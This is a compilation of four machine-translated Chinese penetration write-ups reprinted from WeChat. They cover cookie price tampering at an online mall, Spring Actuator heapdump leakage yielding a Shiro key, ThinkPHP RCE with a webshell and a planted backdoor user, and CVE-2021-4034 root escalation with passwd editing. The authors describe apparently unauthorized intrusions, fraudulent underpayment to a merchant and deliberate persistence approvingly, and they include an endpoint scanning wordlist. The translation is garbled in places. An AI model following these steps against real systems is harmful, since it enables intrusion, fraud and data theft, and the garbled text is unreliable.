One day, I dug edu to find autism, and then thought about fofa to see if there are any fun sites. Good guy, there is such a mall. I forgive me for being ignorant. So I wanted to go in and study First, we conducted a preliminary information collection Basically, they are all pseudo-static, and there is no discovery that you can clearly judge the language of the website backend language. After clicking on the search box, It can be found that this address does not help us determine the type of the site, but we should also try SQL injection Then I was directly called by Ban IP, so I simply gave up on continuing research on this place and continued to search for other functional points. When we click on the order query You can find that Url has changed Jump to the login registration page. Since you have come, register one to see if there is any other business. You can't leave it alone. Hahaha If you try to hit Xs at the nickname, you will find that you will be banned. So let’s put it aside and find out if there are any business logic loopholes. Try to buy some products. I have always heard of payment loopholes before, but my brother has never really encountered it. Try your luck. Click to buy, and I found that a strange parameter appeared in the cookie. Let's take the urldecode to see what it is Then let's guess, you can see that the price should be in front and the number of purchases should be in the back. Let's change it first Coding back, covering the package Because it is in a cookie, the cookies in every data transmitted in the past must be changed It can be found that our unit price has changed to 1, the quantity has changed to 10, and the total amount has changed to 10. Record the corresponding relationship between the parameters. Submit an order, modify the value in the cookie, and then continue, the page jumps to the Alipay payment page Click on Alipay and find that the price has indeed changed That's right, a product worth 75 yuan is only 17 yuan to pay, but it doesn't matter whether the merchant ships it or not. Unexpected surprise Then, I found that there was a parameter that had not been tested before, so let's try it user_zheko, it should mean discount, so I will modify it and verify it It is known that 100 is no discount, so what if I change it to 0? The column where the address cannot be popped up After changing to 1, I really enjoyed a discount, hahahaha It can be found that you only have to pay 14 yuan, and you can continue to pay the fee with a 10% discount. Then there is a 7 yuan postage merchant who does not have free shipping. Then you can pay 21 yuan to bring the booster home. It’s exciting to think about it! Summary at the end of the article: 1. Digging a hole is just one sentence, digging the world with careful rules! 2. When facing logical loopholes, you must pay attention to the parameters when each page is redirected interactively, and guess as much as possible what the function of each parameter passed is. If Burp is inconvenient to watch, you can also see it, and you can see it according to your preferences and habits. You must test carefully and don't miss some small points, maybe you will be surprised 3. I didn’t find any order inquiry to exceed the authority. I didn’t expect that the payment point was actually controllable at the front end. Hehehe Reprinted from the original link: https://mp.weixin.qq.com/s?__biz=Mzg2NDYwMDA1NA==mid=2247486060idx=1sn=a4b977e9e3bbfe7b2c9ec479942e615cchksm=ce67a0f5f91029e30c854eb2f71173efe925a38294fd39017708abcf4deea5c2b25dee518ebfscene=21#wechat_redirect

First encounter with difficulties When I find a bQc station, try to hit the main site first. First try scanning the directory to see if I can find some backgrounds and so on. I am using dirsearch here. But unfortunately, there is no valuable directory and I can't even scan the background, but this is expected. After all, most spinach website protection is done well. Next, try to register an account and take a look. Try injecting, and find that the encryption is not reversed, I can only give up temporarily.After registration, it was found that an upload interface was found.According to the upload, it was found that it was stored in the form of id, and the upload vulnerability could not be caused. This website cannot be obtained and changes its thinking. Try to penetrate the entire IP. First, scan the entire port of this IP and try to obtain more complete information. Two web pages were obtained. rocketmq, this latest version of vulnerability has been exposed and tried. found the tool to try to attack, but failed to execute the command. There is another login interface The shiro framework was found Attempted to blast but no secret key was found. The willows and flowers are bright Breakthrough point: He has a port 8888, and he will jump to the illegal IP when accessing it. After looking at burp, he found that he would visit the login page and then jump to it. Frowning and found that things were not simple. He added a little bit after the IP, which caused him to report an error. He found that he was using the spring framework.Actuator is a functional module provided by Spring Boot for introspection and monitoring of application systems. With the help of Actuator developers, they can easily view and count certain monitoring indicators of application systems. Actuator The core is the endpoint Endpoint, which is used to monitor applications and interactions. There are already many built-in in spring-boot-actuator Endpoint (health, info, beans, metrics, httptrace, shutdown, etc.), and also allows us to expand our own Endpoints. Each Endpoint can be enabled and disabled. To access Endpoint remotely, it must also be exposed via JMX or HTTP, and most applications choose HTTP. Whether the path is enabled by default Function Description /auditevents is to display the audit event information of the current application /beans is to display the complete list of all Spring beans in an application /conditions is to display the status of configuration classes and auto-configuration classes and the reasons why they are applied or not applied /configprops is to display a collection list of all @ConfigurationProperties /env is to display from Spring The property of ConfigurableEnvironment /flyway is to display the database migration path (if present) /health is to display the application's health information (when accessed using an unauthenticated connection, it displays all information details when accessed using an authenticated connection) /info is to display any application information /liquibase is to display any Liquibase database migration path (if present) /metrics is to display the current application's metrics information /mappings is to display Show a list of all @RequestMapping paths /scheduledtasks is showing scheduled tasks in the application /sessions does not allow user sessions to be retrieved and deleted from Spring session supported session storage /shutdown does not allow the application to be closed elegantly (not enabled by default) /threaddump is executing a thread dump/heapdump is returning a GZip compressed hprof heap dump file /jolokia is exposing JMX via HTTP beans (Which when Jolokia is on the classpath, WebFlux is not available) /logfile returns the content of the log file (if the logging.file or logging.path attribute is set), and supports the use of HTTP Range headers to receive part of the information of the log file content. Prometheus is to display metrics information in a format that can be crawled by the Prometheus server and directly use the directory collected by spring for directory scanning. actuator actuator/auditLog actuator/auditevents actuator/autoconfig actuator/beans actuator/caches actuator/conditions actuator/configurationMetadata actuator/configprops actuator/dump actuator/env actuator/events actuator/exportRegisteredServices actuator/features actuator/flyway actuator/health actuator/heapdump actuator/healthcheck actuator/heapdump actuator/httptrace actuator/hystrix.stream actuator/info actuator/integrationgraph actuator/jolokia actuator/logfile actuator/loggers actuator/loggingConfig actuator/liquibase actuator/metrics actuator/mappings actuator/scheduledtasks actuator/swagger-ui.html actuator/prometheus actuator/refresh actuator/registeredServices actuator/releaseAttributes actuator/resolveAttributes actuator/scheduledtasks actuator/sessions actuator/springWebflow actuator/shutdown actuator/sso actuator/ssoSessions actuator/statistics actuator/status actuator/threaddump actuator/trace auditivets autoconfig api.html api/index.html api/swagger-ui.html api/v2/api-docs api-docs beans caches cloudfoundryapplication conditions configprops distv2/index.html docs druid/index.html druid/login.html druid/websession.html dubbo-provider/distv2/index.html dump entity/all env env/(name) eureka flyway gateway/actuator gateway/actuator/auditevents gateway/actuator/beans gateway/actuator/conditions gateway/actuator/configprops gateway/actuator/env gateway/actuator/health gateway/actuator/heapdump gateway/actuator/httptrace gateway/actuator/hystrix.stream gateway/actuator/info gateway/actuator/jolokia gateway/actuator/logfile gateway/actuator/loggers gateway/actuator/mappings gateway/actuator/metrics gateway/actuator/scheduledtasks gateway/actuator/swagger-ui.html gateway/actuator/threaddump gateway/actuator/trace health heapdump heapdump.json httptrace hystrix hystrix.stream info integrationgraph jolokia jolokia/list liquibase list logfile loggers liquibase metrics mappings Monitor prometheus Refresh scheduledtasks sessions shutdown spring-security-oauth-resource/swagger-ui.html spring-security-rest/api/swagger-ui.html static/swagger.json sw/swagger-ui.html swagger swagger/codes swagger/index.html swagger/static/index.html swagger/swagger-ui.html swagger-dubbo/api-docs swagger-ui swagger-ui.html swagger-ui/html swagger-ui/index.html system/druid/index.html threaddump template/swagger-ui.html trace user/swagger-ui.html Version v1.1/swagger-ui.html v1.2/swagger-ui.html v1.3/swagger-ui.html v1.4/swagger-ui.html v1.5/swagger-ui.html v1.6/swagger-ui.html v1.7/swagger-ui.html /v1.8/swagger-ui.html /v1.9/swagger-ui.html /v2.0/swagger-ui.html v2.1/swagger-ui.html v2.2/swagger-ui.html v2.3/swagger-ui.html v2/swagger.json webpage/system/druid/index.html %20/swagger-ui.html starts scanning and finds heapdump exists in it, download it. Heap Dump is also called a heap dump file. It is a memory snapshot of a Java process at a certain point in time. The leaked heapdump file can be analyzed through the Eclipse MemoryAnalyzer tool and query the plaintext password information loaded into memory, such as redis password, mysql database account and password. Here I am using Master Whwlsfb's JDumpSpider https://github.com/whwlsfb/JDumpSpider Successfully obtain shiro's key into the memory horse. Obtain administrator permissions Reprinted from the original link address: https://mp.weixin.qq.com/s/-ZdaVuqVmsw9PCHYDYuABA

Preface On a sunny afternoon, we were talking enthusiastically under the leadership of Blank, women. And Mr. float discovered a strange IP that visited his blog. Alas, I don’t take any network security laws seriously at all, just start fighting. Game Start Browser access will directly jump to the login interface. Information Collection Knock an X on the path. Get ThinkPHP and version number. At the same time, Mr. float nmap scanned to port 801 and confirmed that it was Baota website building. However, there is no further study here. RCE attempt 5.0.21 can directly RCE, and payload is flying all over the sky. But I still encountered a little pitfall. The module name is not the usual index and must exist. Log in according to the jump: /admin/login/index.html It was guessed that the module was admin, and it was indeed successful. Disable_functions is in the column, and rce is indeed unsuccessful. Still Horse The good news is that the file was successfully written. Visit shell.php and see the phpinfo interface. The backhand wrote about the ice scorpion and horse connecting it. I took the opportunity to take a look, loan, manager, salesperson, bc. OK, keep on playing. Connect the database Hard coding is really a problem in the universe, and the database password is obtained. The first time I encountered MySQL password, there is @ in it, writing it directly will destroy the connection string. like: mysql://root:[email protected]:3306/mysql The @ in password will make the judgment that the ip: port will go to the ip: port in advance. It needs to be encoded as %40 Administrator login There is no progress in flipping the web directory and code, so try to log in to the system. There is an account password in the database, of course, the password is a hash with salt. Whoever has a good family must have a password, just patch the login code, and then you won’t check the table. Log in to the system. This business looks so advanced, I can't understand it a little, so I leave the backdoor user in case of missed Reprinted from the original link: https://mp.weixin.qq.com/s/f4nWOGgPXlSA_ChgpBj7Zw

A spinach-to-day from a big brother, which is a 0-day upload of any file. The webshell is obtained by uploading any file, but you can see that the pagoda is opened by scanning the port. Then the following problem arose. Use Godzilla's bypass plugin to execute commands. The user is WWW, the default user of Baota. The next step is to regular operations, increase authority and log in to Baota. First carry out the escalation, upload the escalation cow and then look at the escalation exp that can be used. After running, use CVE-2021-4034 to increase the rights, and first upload the EXP file to the spinach server. Bounce the shell, then enter the exp folder to compile and run to obtain root permissions. After obtaining the root permissions, you will do the work, just create an account and grant permissions. The rebound shell cannot vim, then saves its passwd file locally and then gives 0 to the third column, so that logging in afterwards is root. The account created is ftpp, then save it as passwd file and upload it to the web directory. Use the root permissions after the privilege escalation to delete passwd first and then copy it. Because this server has a Baota control panel, first enter /www/server/panel/data. There is a default.db file in this folder, which is the Baota configuration data file. After saving it locally, modify its pagoda password and log in. Then remember to restore the db data file after the end, so that his password will be the original password. Then change the password and log in. By logging in, you can see the complete information of the site, as well as the database password, web directory, and his mobile phone number, but the mobile phone number is only the first three and the last four, and the middle four digits are number *. The previous method of checking the mobile phone number is useless. In fact, just call it here, and just hand it over to the police to arrest the person. Reprinted from the original link: https://mp.weixin.qq.com/s/iUipOa4BI8mCBJ7o2QgJrA